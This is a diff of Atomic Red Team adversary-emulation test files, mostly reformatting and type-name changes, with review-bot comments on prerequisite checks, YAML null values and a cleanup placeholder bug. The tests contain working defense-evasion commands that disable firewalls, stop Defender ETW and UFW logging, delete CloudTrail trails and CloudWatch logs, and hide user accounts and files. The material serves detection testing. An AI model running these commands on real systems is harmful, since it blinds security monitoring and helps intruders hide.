@@ -112,22 +112,22 @@ atomic_tests: cleanup_command: | ufw enable ufw status verbose -- name: Stop/Start UFW firewall systemctl +- name: Stop/Start UFW firewall systemctl auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1 description: | Stop the Uncomplicated Firewall (UFW) if installed, using systemctl. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if systemctl and ufw is installed on the machine. - prereq_command: | - if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if systemctl and ufw is installed on the machine. + prereq_command: | + if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true 
@@ -136,21 +136,21 @@ atomic_tests: cleanup_command: | systemctl start ufw systemctl status ufw -- name: Turn off UFW logging +- name: Turn off UFW logging auto_generated_guid: 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad description: | Turn off the Uncomplicated Firewall (UFW) logging. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if ufw is installed on the machine and enabled. - prereq_command: | - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if ufw is installed on the machine and enabled. + prereq_command: | + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true 
@@ -159,21 +159,21 @@ atomic_tests: cleanup_command: | ufw logging low ufw status verbose -- name: Add and delete UFW firewall rules +- name: Add and delete UFW firewall rules auto_generated_guid: b2563a4e-c4b8-429c-8d47-d5bcb227ba7a description: | Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if ufw is installed on the machine and enabled. - prereq_command: | - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if ufw is installed on the machine and enabled. + prereq_command: | + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true 
@@ -183,20 +183,20 @@ atomic_tests: cleanup_command: | { echo y; echo response; } | ufw delete 1 ufw status numbered -- name: Edit UFW firewall user.rules file +- name: Edit UFW firewall user.rules file auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: | Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/ufw/user.rules exists. - prereq_command: | - if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/ufw/user.rules exists. + prereq_command: | + if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -205,7 +205,7 @@ atomic_tests: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules -- name: Edit UFW firewall ufw.conf file +- name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: | Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -213,13 +213,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/ufw/ufw.conf exists. - prereq_command: | - if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/ufw/ufw.conf exists. + prereq_command: | + if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true 
@@ -229,7 +229,7 @@ atomic_tests: cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf cat /etc/ufw/ufw.conf -- name: Edit UFW firewall sysctl.conf file +- name: Edit UFW firewall sysctl.conf file auto_generated_guid: c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 description: | Edit the Uncomplicated Firewall (UFW) configuration file for setting network @@ -237,13 +237,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/ufw/sysctl.conf exists. - prereq_command: | - if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/ufw/sysctl.conf exists. + prereq_command: | + if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -253,7 +253,7 @@ atomic_tests: cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf cat /etc/ufw/sysctl.conf -- name: Edit UFW firewall main configuration file +- name: Edit UFW firewall main configuration file auto_generated_guid: 7b697ece-8270-46b5-bbc7-6b9e27081831 description: | Edit the Uncomplicated Firewall (UFW) main configuration file for setting @@ -261,13 +261,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/default/ufw exists. - prereq_command: | - if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/default/ufw exists. + prereq_command: | + if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true 
@@ -276,7 +276,7 @@ atomic_tests: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw -- name: Tail the UFW firewall log file +- name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: | Print the last 10 lines of the Uncomplicated Firewall (UFW) log file @@ -284,13 +284,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /var/log/ufw.log exists. - prereq_command: | - if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /var/log/ufw.log exists. + prereq_command: | + if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -300,7 +300,7 @@ atomic_tests: - name: LockBit Black - Unusual Windows firewall registry modification -cmd auto_generated_guid: a4651931-ebbb-4cde-9363-ddf3d66214cb description: | - An adversary tries to modify the windows firewall registry + An adversary tries to modify the windows firewall registry supported_platforms: - windows executor: @@ -315,7 +315,7 @@ atomic_tests: - name: LockBit Black - Unusual Windows firewall registry modification -Powershell auto_generated_guid: 80b453d1-eec5-4144-bf08-613a6c3ffe12 description: | - An adversary tries to modify the windows firewall registry. + An adversary tries to modify the windows firewall registry. supported_platforms: - windows executor: 
@@ -323,14 +323,14 @@ atomic_tests: New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force cleanup_command: | - Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -Force -ErrorAction Ignore - Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore name: powershell elevation_required: true - name: Blackbit - Disable Windows Firewall using netsh firewall auto_generated_guid: 91f348e6-3760-4997-a93b-2ceee7f254ee description: | - An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works). + An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works). supported_platforms: - windows executor: @@ -339,4 +339,4 @@ atomic_tests: cleanup_command: | netsh firewall set opmode mode=enable >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml index 9e8c462b..181016f1 100644 --- a/atomics/T1562.006/T1562.006.yaml +++ b/atomics/T1562.006/T1562.006.yaml 
@@ -10,15 +10,15 @@ atomic_tests: input_arguments: audisp_config_file_name: description: The name of the audispd configuration file to be changed - type: String + type: string default: audispd.conf auditd_config_file_name: description: The name of the auditd configuration file to be changed - type: String + type: string default: auditd.conf libaudit_config_file_name: description: The name of the libaudit configuration file to be changed - type: String + type: string default: libaudit.conf executor: command: | @@ -46,15 +46,15 @@ atomic_tests: input_arguments: syslog_config_file_name: description: The name of the syslog configuration file to be changed - type: String + type: string default: syslog.conf rsyslog_config_file_name: description: The name of the rsyslog configuration file to be changed - type: String + type: string default: rsyslog.conf syslog_ng_config_file_name: description: The name of the syslog-ng configuration file to be changed - type: String + type: string default: syslog-ng.conf executor: command: | @@ -81,7 +81,7 @@ atomic_tests: elevation_required: true - name: Disable Powershell ETW Provider - Windows auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84 - description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. + description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. supported_platforms: - windows input_arguments: 
@@ -132,8 +132,8 @@ atomic_tests: - name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 description: | - An adversary can disable the ETW Provider of Windows Defender, - so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. + An adversary can disable the ETW Provider of Windows Defender, + so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. supported_platforms: - windows executor: @@ -146,14 +146,14 @@ atomic_tests: - name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02 description: | - An adversary can disable the ETW Provider of Windows Defender, - so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. + An adversary can disable the ETW Provider of Windows Defender, + so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. supported_platforms: - windows executor: command: | New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -PropertyType DWord -Value 0 -Force cleanup_command: | - Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index d4031a14..61fe2ac4 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml 
@@ -10,33 +10,33 @@ atomic_tests: input_arguments: cloudtrail_name: description: Name of the cloudTrail - type: String + type: string default: "redatomictesttrail" s3_bucket_name: description: Name of the bucket - type: String + type: string default: "redatomic-test" region: description: Name of the region - type: String + type: string default: "us-east-1" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} - aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} + aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} - aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} - aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} - aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} + aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} + aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} + aws cloudtrail stop-logging --name 
#{cloudtrail_name} --region #{region} + aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} cleanup_command: | - aws s3 rb s3://#{s3_bucket_name} --force + aws s3 rb s3://#{s3_bucket_name} --force name: sh elevation_required: false - name: Azure - Eventhub Deletion @@ -51,24 +51,24 @@ atomic_tests: input_arguments: username: description: Azure username - type: String - default: null + type: string + default: password: description: Azure password - type: String - default: null + type: string + default: event_hub_name: description: Name of the eventhub - type: String + type: string default: "test_eventhub" resource_group: description: Name of the resource group - type: String - default: null + type: string + default: name_space_name: description: Name of the NameSpace - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -97,12 +97,12 @@ atomic_tests: input_arguments: username: description: office-365 username - type: String - default: null + type: string + default: password: description: office-365 password - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -137,11 +137,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1562.008/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: 
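Review bot: In the CloudTrail test's `prereq_command` the check mutates the account: after the credentials grep it runs `aws s3api create-bucket` and `put-bucket-policy`, so every prerequisite check creates resources, and because the script's exit status is presumably that of its last command a failed grep is masked. Move bucket creation into `get_prereq_command` (which today only prints a message) and make the check a pure test, e.g. `grep -q '^\[default\]' ~/.aws/credentials && aws s3api head-bucket --bucket #{s3_bucket_name}`. The bare `cat ~/.aws/credentials | grep "default"` also matches the word anywhere in the file rather than the `[default]` stanza; the same grep is reindented in the stratus and CloudWatch hunks further down.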
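Review bot: In the Eventhub hunk `default: null` becomes a bare `default:` for username, password, resource_group and name_space_name; both parse to null, so runtime behaviour is unchanged, but the bare form relies on implicit typing and is what yamllint's `empty-values` rule flags. If the intent is "no default, the operator must supply it", keep that explicit with `default: null`, or use `default: ""` if consumers expect a string for a `type: string` argument. The same substitution is made for username and password in the Office 365 hunk that follows.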
@@ -159,11 +159,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | @@ -191,11 +191,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1562.008/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: @@ -213,11 +213,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | @@ -245,11 +245,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1562.008/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: 
@@ -267,11 +267,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | @@ -288,7 +288,7 @@ atomic_tests: ./stratus cleanup --all rm -rf stratus* name: sh - elevation_required: false + elevation_required: false - name: AWS - CloudWatch Log Group Deletes auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121 description: | 
@@ -299,26 +299,26 @@ atomic_tests: input_arguments: cloudwatch_log_group_name: description: Name of the cloudWatch log group - type: String + type: string default: "log-test" region: description: Name of the region - type: String + type: string default: "us-east-1" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Created ***" - aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Deleted ***" - cleanup_command: + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: name: sh elevation_required: false - name: AWS - CloudWatch Log Stream Deletes 
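Review bot: `cleanup_command:` is left with no value, which YAML reads as null rather than an empty command; since the executor already deletes the log group it created, either drop the key or write `cleanup_command: ""` so the "nothing to clean up" intent is explicit and not dependent on how the runner treats null. The same bare key is carried in the two CloudWatch hunks that follow.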
@@ -331,26 +331,26 @@ atomic_tests: input_arguments: cloudwatch_log_group_name: description: Name of the cloudWatch log group - type: String + type: string default: "log-test" region: description: Name of the region - type: String + type: string default: "us-east-1" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Created ***" - aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Deleted ***" - cleanup_command: + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: name: sh elevation_required: false - name: AWS CloudWatch Log Stream Deletes 
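Review bot: The test headed `AWS - CloudWatch Log Stream Deletes` (the context line closing the previous hunk) has an executor identical to the log-group test above it — it creates and deletes a log group and never touches a log stream — so its name does not describe what it exercises. Either add `aws logs create-log-stream` / `delete-log-stream` steps as the following `AWS CloudWatch Log Stream Deletes` test does, or rename this one to say it deletes a log group. That `cloudwatch_log_group_name` and `region` are its only inputs supports the reading that this is a duplicated log-group test.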
@@ -363,33 +363,33 @@ atomic_tests: input_arguments: cloudwatch_log_group_name: description: Name of the cloudWatch log group - type: String + type: string default: "test-logs" cloudwatch_log_stream_name: description: Name of the cloudWatch log stream - type: String + type: string default: "20150601" region: description: Name of the region - type: String + type: string default: "us-west-2" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Created ***" - aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} - echo "*** Log Stream Created ***" - aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} - echo "*** Log Stream Deleted ***" - aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Deleted ***" - cleanup_command: + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Created ***" + aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name 
#{cloudwatch_log_stream_name} + echo "*** Log Stream Deleted ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1563.002/T1563.002.yaml b/atomics/T1563.002/T1563.002.yaml index e3dd363a..67687c6e 100644 --- a/atomics/T1563.002/T1563.002.yaml +++ b/atomics/T1563.002/T1563.002.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: Session_ID: description: The ID of the session to which you want to connect - type: String + type: string default: "1337" Destination_ID: description: Connect the session of another user to a different session - type: String + type: string default: rdp-tcp#55 executor: command: | diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml index 2abeae0e..e731f985 100644 --- a/atomics/T1564.001/T1564.001.yaml +++ b/atomics/T1564.001/T1564.001.yaml @@ -35,7 +35,7 @@ atomic_tests: input_arguments: file_to_modify: description: File to modify using Attrib command - type: String + type: string default: '%temp%\T1564.001.txt' dependency_executor_name: command_prompt dependencies: @@ -62,7 +62,7 @@ atomic_tests: input_arguments: file_to_modify: description: File to modify using Attrib command - type: String + type: string default: '%temp%\T1564.001.txt' dependency_executor_name: command_prompt dependencies: @@ -88,7 +88,7 @@ atomic_tests: input_arguments: filename: description: path of file to hide - type: Path + type: path default: /tmp/evil executor: command: | diff --git a/atomics/T1564.002/T1564.002.yaml b/atomics/T1564.002/T1564.002.yaml index e67321cf..f2ad2ce1 100644 --- a/atomics/T1564.002/T1564.002.yaml +++ b/atomics/T1564.002/T1564.002.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: user_name: description: username to add - type: String + type: string default: APT executor: command: | 
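Review bot: `create-log-stream` and `delete-log-stream` are run without `--region #{region}` while the surrounding `create-log-group` / `delete-log-group` calls pass it, so when the profile's configured region differs from `#{region}` (default `us-west-2`) the stream calls go to a different region, where the group does not exist, and fail. Add the flag to both stream lines, e.g. `aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}`.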
@@ -28,7 +28,7 @@ atomic_tests:
 input_arguments:
 user_name:
 description: username to add
- type: String
+ type: string
 default: APT
 executor:
 command: |
@@ -47,11 +47,11 @@ atomic_tests:
 input_arguments:
 user_password:
 description: Password for new user account
- type: String
+ type: string
 default: At0micRedTeam!
 user_name:
 description: Username
- type: String
+ type: string
 default: AtomicOperator
 executor:
 command: |
@@ -61,4 +61,4 @@ atomic_tests:
 reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v #{user_name}$ /f >nul 2>&1
 net user ${user_name}$ /delete >nul 2>&1
 name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
diff --git a/atomics/T1564.003/T1564.003.yaml b/atomics/T1564.003/T1564.003.yaml
index ee9742f2..da0c1d4d 100644
--- a/atomics/T1564.003/T1564.003.yaml
+++ b/atomics/T1564.003/T1564.003.yaml
@@ -11,9 +11,9 @@ atomic_tests:
 input_arguments:
 powershell_command:
 description: Command to launch calc.exe from a hidden PowerShell Window
- type: String
+ type: string
 default: powershell.exe -WindowStyle hidden calc.exe
 executor:
 command: |
 Start-Process #{powershell_command}
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1564.004/T1564.004.yaml b/atomics/T1564.004/T1564.004.yaml
index d615f3e6..4cc3a8ae 100644
--- a/atomics/T1564.004/T1564.004.yaml
+++ b/atomics/T1564.004/T1564.004.yaml
@@ -14,7 +14,7 @@ atomic_tests:
 input_arguments:
 path:
 description: Path of ADS file
- type: Path
+ type: path
 default: c:\ADS\
 executor:
 command: |
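Review bot: The cleanup line `net user ${user_name}$ /delete >nul 2>&1` in the `@@ -61,4 +61,4 @@` hunk uses `${user_name}` where the `reg delete` line directly above it uses the `#{user_name}` placeholder, so the argument is never substituted and the cleanup tries to delete a literal `${user_name}$` account rather than the one the test created. Change it to `net user #{user_name}$ /delete >nul 2>&1`. The enclosing `cleanup_command:` block starts outside the hunk, and the commit itself only fixes the missing trailing newline here.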
@@ -40,15 +40,15 @@ atomic_tests:
 input_arguments:
 payload_path:
 description: Path of file to hide in ADS
- type: Path
+ type: path
 default: c:\windows\system32\cmd.exe
 ads_file_path:
 description: Path of file to create an ADS under
- type: Path
+ type: path
 default: C:\Users\Public\Libraries\yanki\desktop.ini
 ads_name:
 description: Name of ADS
- type: String
+ type: string
 default: desktop.ini
 executor:
 command: |
@@ -70,11 +70,11 @@ atomic_tests:
 input_arguments:
 file_name:
 description: File name of file to create ADS on.
- type: String
+ type: string
 default: '%temp%\T1564.004_has_ads_cmd.txt'
 ads_filename:
 description: Name of ADS.
- type: String
+ type: string
 default: adstest.txt
 executor:
 command: |
@@ -93,11 +93,11 @@ atomic_tests:
 input_arguments:
 file_name:
 description: File name of file to create ADS on.
- type: String
+ type: string
 default: $env:TEMP\T1564.004_has_ads_powershell.txt
 ads_filename:
 description: Name of ADS file.
- type: String
+ type: string
 default: adstest.txt
 dependency_executor_name: powershell
 dependencies:
diff --git a/atomics/T1564.006/T1564.006.yaml b/atomics/T1564.006/T1564.006.yaml
index 68efb6c7..137b07f8 100644
--- a/atomics/T1564.006/T1564.006.yaml
+++ b/atomics/T1564.006/T1564.006.yaml
@@ -11,11 +11,11 @@ atomic_tests:
 input_arguments:
 msi_file_path:
 description: Path to the MSI file
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi
 cab_file_path:
 description: Path to the CAB file
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1564.006\bin\common.cab
 dependency_executor_name: powershell
 dependencies:
@@ -61,27 +61,27 @@ atomic_tests:
 https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
 https://attack.mitre.org/techniques/T1564/006/
 supported_platforms:
- - windows
+ - windows
 input_arguments:
 vm_name:
 description: Name of the new virtual machine
- type: String
+ type: string
 default: Atomic VM
 virtualbox_exe:
 description: Path to the VirtualBox executable
- type: Path
+ type: path
 default: C:\Program Files\Oracle\VirtualBox\VirtualBox.exe
 vboxmanage_exe:
 description: Path to the executable for VBoxManage, the command-line interface to VirtualBox
- type: Path
+ type: path
 default: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe
 virtualbox_download:
 description: URL for the current installer for the Windows version of VirtualBox, as of March 2022
- type: Url
+ type: url
 default: https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe
